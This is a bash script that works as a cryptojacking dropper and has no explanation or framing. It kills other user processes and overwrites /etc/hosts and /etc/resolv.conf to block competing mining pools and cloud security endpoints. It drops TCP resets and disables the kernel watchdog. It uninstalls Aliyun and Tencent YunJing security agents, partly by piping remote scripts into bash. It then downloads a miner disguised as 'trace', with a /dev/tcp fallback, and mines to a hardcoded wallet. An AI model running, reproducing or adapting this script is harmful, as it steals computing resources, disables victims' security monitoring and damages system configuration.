#!/bin/bash
curl http://lumtest.com/myip.json
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
echo "${threadCount}";
initdir=$PWD
lscpu
if [[ $(whoami) != "root" ]]; then
    for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
        kill -9 $tr || : ;
    done;
fi
sudo echo no > /etc/hosts
sudo echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
sudo echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
sudo echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
sudo echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
sudo echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
sudo echo "0.0.0.0 mine.c3pool.com" >> /etc/hosts
sudo echo "0.0.0.0 Pool.XCA.CryptoPool.Space" >> /etc/hosts
sudo echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts
sudo echo "0.0.0.0 xmr-asia1.nanopool.org" >> /etc/hosts
sudo echo "0.0.0.0 xmr-jp1.nanopool.org" >> /etc/hosts
echo thxforjobs
echo no > /etc/hosts
echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
echo "0.0.0.0 mine.c3pool.com" >> /etc/hosts
echo "0.0.0.0 Pool.XCA.CryptoPool.Space" >> /etc/hosts
echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts
echo "0.0.0.0 xmr-asia1.nanopool.org" >> /etc/hosts
echo "0.0.0.0 xmr-jp1.nanopool.org" >> /etc/hosts

sudo iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP

sudo echo "nope" >/tmp/log_rot;
sudo sysctl kernel.nmi_watchdog=0
sudo echo '0' > /proc/sys/kernel/nmi_watchdog
sudo echo 'kernel.nmi_watchdog=0' >> /etc/sysctl.conf

iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP

echo "nope" >/tmp/log_rot;
sysctl kernel.nmi_watchdog=0
echo '0' > /proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >> /etc/sysctl.conf


if ps aux | grep -i '[a]liyun'; then
  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi



threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";

_curl () {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

rm -rf config.json;

d () {
  curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2;
}


test ! -s trace && \
    d https://github.com/mintme-com/miner/releases/download/v2.8.0/webchain-miner-2.8.0-linux-amd64.tar.gz trace.tgz && \
    tar -zxvf trace.tgz && \
    mv webchain-miner trace && \
    rm -rf trace.tgz;

test ! -x trace && chmod +x trace;

k() {
    ./trace \
        -o $1 \
        -u 0xbDdd3a19072d52c50973b0cbF7bDC7CC52A7B6bc \
        -p x \
		--worker-id=F003
}

k web-ko1.gonspool.com:3333